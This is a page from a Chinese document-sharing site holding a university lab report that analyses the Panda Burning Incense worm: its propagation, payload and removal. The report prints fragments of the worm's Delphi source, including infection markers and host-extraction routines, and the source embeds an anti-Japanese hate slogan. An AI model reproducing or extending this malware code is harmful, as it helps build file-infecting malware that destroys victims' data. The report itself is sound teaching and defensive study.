信息安全熊猫烧香病毒剖析

上传人:hs****ma 文档编号:487886013 上传时间:2022-08-29 格式:DOCX 页数:27 大小:186.12KB
返回 下载 相关 举报
信息安全熊猫烧香病毒剖析_第1页
第1页 / 共27页
信息安全熊猫烧香病毒剖析_第2页
第2页 / 共27页
信息安全熊猫烧香病毒剖析_第3页
第3页 / 共27页
信息安全熊猫烧香病毒剖析_第4页
第4页 / 共27页
信息安全熊猫烧香病毒剖析_第5页
第5页 / 共27页
点击查看更多>>
资源描述

《信息安全熊猫烧香病毒剖析》由会员分享,可在线阅读,更多相关《信息安全熊猫烧香病毒剖析(27页珍藏版)》请在金锄头文库上搜索。

1、-网络攻击与防御实验报告计算机科学与技术学院计算机系网络教研室制课程名称:信息平安原理与实践实验名称:熊猫烧香病毒剖析实验成绩:. z-实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节,而实验报告的撰写又是知识系统化的吸收和升华过程,因此,实验报告应该表达完整性、规性、正确性、有效性。现将实验报告撰写的有关容说明如下:1、实验报告模板为电子版。2、下载统一的实验报告模板,学生自行完成撰写和打印。报告的首页包含本次实验的一般信息:l l组号:例如:2-5 表示第二班第5组。l l实验日期:例如:05-10-06 表示本次实验日期。(年-月-日)l l实验编号:例如:No.1 表示第一个

2、实验。l l实验时间:例如:2学时表示本次实验所用的时间。实验报告正文局部,从六个方面目的、容、步骤等反映本次实验的要点、要求以及完成过程等情况。模板已为实验报告正文设定统一格式,学生只需在相应项填充即可。续页不再需要包含首页中的实验一般信息。3、实验报告正文局部具体要求如下:一、实验目的本次实验所涉及并要求掌握的知识点。二、实验环境实验所使用的设备名称及规格,网络管理工具简介、版本等。三、实验内容与实验要求实验内容、原理分析及具体实验要求。四、实验过程与分析根据具体实验,记录、整理相应命令、运行结果等,包括截图和文字说明。详细记录在实验过程中发生的故障和问题,并进展故障分析,说明故障排除的过

3、程及方法。五、实验结果总结对实验结果进展分析,完成思考题目,总结实验的心得体会,并提出实验的改良意见。六、附录. z-一、实验目的1掌握熊猫烧香病毒的工作原理和感染方法;2掌握手工去除熊猫病毒的根本方法。二、实验环境目标主机为windows-2003所用到的工具o Wsyschecko Filemon三、实验容与实验要求蠕虫原理1蠕虫定义 2007年1月流行的熊猫烧香以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进展传播,最终破坏用户的大局部重要数据。蠕虫病毒是自包含的程序(或是一套程序),它能传播它自

4、身功能的拷贝或它的*些局部到其他的计算机系统中(通常是经过网络连接)。请注意,与一般病毒不同,蠕虫不需要将其自身附着到宿主程序,有两种类型的蠕虫:主机蠕虫与网络蠕虫。主计算机蠕虫完全包含在它们运行的计算机中,并且使用网络的连接仅将自身拷贝到其他的计算机中,主计算机蠕虫在将其自身的拷贝参加到另外的主机后,就会终止它自身(因此在任意给定的时刻,只有一个蠕虫的拷贝运行),这种蠕虫有时也叫野兔。蠕虫一般不采取利用pe格式插入文件的方法,而是复制自身在互联网环境下进展传播,病毒的传染能力主要是针对计算机的文件系统而言,而蠕虫病毒的传染目标是互联网的所有计算机。局域网条件下的共享文件夹,电子email,网

5、络中的恶意网页,大量存在着漏洞的效劳器等都成为蠕虫传播的良好途径。蠕虫和传统病毒的区别: 传统病毒主要攻击的是文件系统,在其传染的过程中,计算机使用者是传染的触发者,是传染的关键环节,使用者计算机知识水平的上下常常决定了传统病毒所能造成的破坏程度; 蠕虫主要是利用计算机系统漏洞进展传染,在搜索到网络中存在漏洞的计算机后,主动进展攻击。在传染的过程中,与计算机操作者是否进展操作无关,从而与使用者的计算机知识水平无关。2蠕虫的根本程序构造 传播模块:负责蠕虫的传播,通过检查主机或远程计算机的地址库,找到可进一步传染的其他计算机。 隐藏模块:侵入主机后,隐藏蠕虫程序,防止被用户发现。 目的功能模块:

6、实现对计算机的控制、监视或破坏等功能。传播模块由可以分为三个根本模块:扫描模块、攻击模块和复制模块。蠕虫程序功能模型也可以扩展为如下的形式:3蠕虫程序的一般传播过程 扫描:由蠕虫的扫描功能模块负责探测存在漏洞的主机。当程序向*个主机发送探测漏洞的信息并收到成功的反应信息后,就得到一个可传播的对象。 攻击:攻击模块按漏洞攻击步骤自动攻击步骤1中找到的对象,取得该主机的权限一般为管理员权限,获得一个shell。 复制:复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。蠕虫将自身复制到*台计算机之前,也会试图判断该计算机以前是都已被感染过。在分布式系统中,蠕虫可能会以系统程序名或不易被操

7、作系统发觉的名字来为自己命名,从而伪装自己。同时,我们也可以看到,传播模块实现的实际上是自动入侵的功能。所以蠕虫的传播技术是蠕虫技术的首要技术,没有蠕虫的传播技术,也就谈不上什么蠕虫技术了。熊猫烧香蠕虫病毒1熊猫烧香档案又名:尼亚姆、男生、worm.whBoy、worm.nimaya后又化身为:金猪报喜病毒类型:蠕虫病毒影响系统:Windows 9*/ME/NT/2000/*P/2003/Vista/72熊猫烧香病毒特点 2006年底,我国互联网上大规模爆发熊猫烧香病毒及其变种,该病毒通过多种方式进展传播,同时该病毒还具有盗取用户游戏账号、QQ账号等功能。该病毒传播速度快,危害围广,截至案发为

8、止,已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏,引起社会各界高度关注。瑞星2006平安报告将其列为十大病毒之首,在2006年度中国计算机病毒疫情和互联网平安报告的十大病毒排行中一举成为毒王。熊猫烧香,是一个感染型的蠕虫病毒,它能感染系统中e*e,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丧失。被感染的用户系统中所有.e*e可执行文件全部被改成熊猫举着三根香的模样。熊猫烧香源码分析含有病毒体的文件被运行后,病毒将自身复制至系统目录,同时修改注册表将自身设置为开机

9、启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户翻开该磁盘时激活病毒体。随后病毒体创立一个线程进展本地文件感染,同时创立另外一个线程连接下载DOS程序发动恶意攻击。下面,我们分析一下用delphi语言描述的熊猫烧香的主要源代码:program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI, Registry;constHeaderSize = 82432; /病毒体的大小IconOffset = $12EB8; /PE文件主图标的偏移量/查找2800000020的十六进制字符

10、串可以找到主图/标的偏移量HeaderSize = 38912; /Up*压缩过病毒体的大小IconOffset = $92BC; /Up*压缩过PE文件主图标的偏移量/Up* 1.24W 用法: up* -9 -8086 Japussy.e*eIconSize = $2E8; /PE文件主图标的大小-744字节IconTail = IconOffset + IconSize; /PE文件主图标的尾部ID = $44444444; /感染标记/垃圾码,以备写入Catchword = If a race need to be killed out, it must be Yamato. +If

11、a country need to be destroyed, it must be Japan! +* W32.Japussy.Worm.A *;$R *.RESfunction RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;stdcall; e*ternal Kernel32.dll;/函数声明varTmpFile: string;Si: STARTUPINFO;Pi: PROCESS_INFORMATION;IsJap: Boolean = False; /日文操作系统标记 =判断是否为Win9*= funct

12、ion IsWin9*: Boolean;varVer: TOSVersionInfo;beginResult := False;Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);if not GetVersionE*(Ver) thenE*it;if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then /Win9*Result := True;end;=在流之间复制= procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: T

13、Stream;dStartPos: Integer; Count: Integer);varsCurPos, dCurPos: Integer;beginsCurPos := Src.Position;dCurPos := Dst.Position;Src.Seek(sStartPos, 0);Dst.Seek(dStartPos, 0);Dst.CopyFrom(Src, Count);Src.Seek(sCurPos, 0);Dst.Seek(dCurPos, 0);end;=将宿主文件从已感染的PE文件中别离出来,以备使用= procedure E*tractFile(FileName:

14、 string);varsStream, dStream: TFileStream;begintrysStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);trydStream := TFileStream.Create(FileName, fmCreate);trysStream.Seek(HeaderSize, 0); /跳过头部的病毒局部dStream.CopyFrom(sStream, sStream.Size - HeaderSize);finallydStream.Free;end;finallysStream.Free;end;e*ceptend;end;=填充STARTUPINFO构造= procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);beginSi.cb := SizeOf(Si);Si

展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 建筑/环境 > 施工组织

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号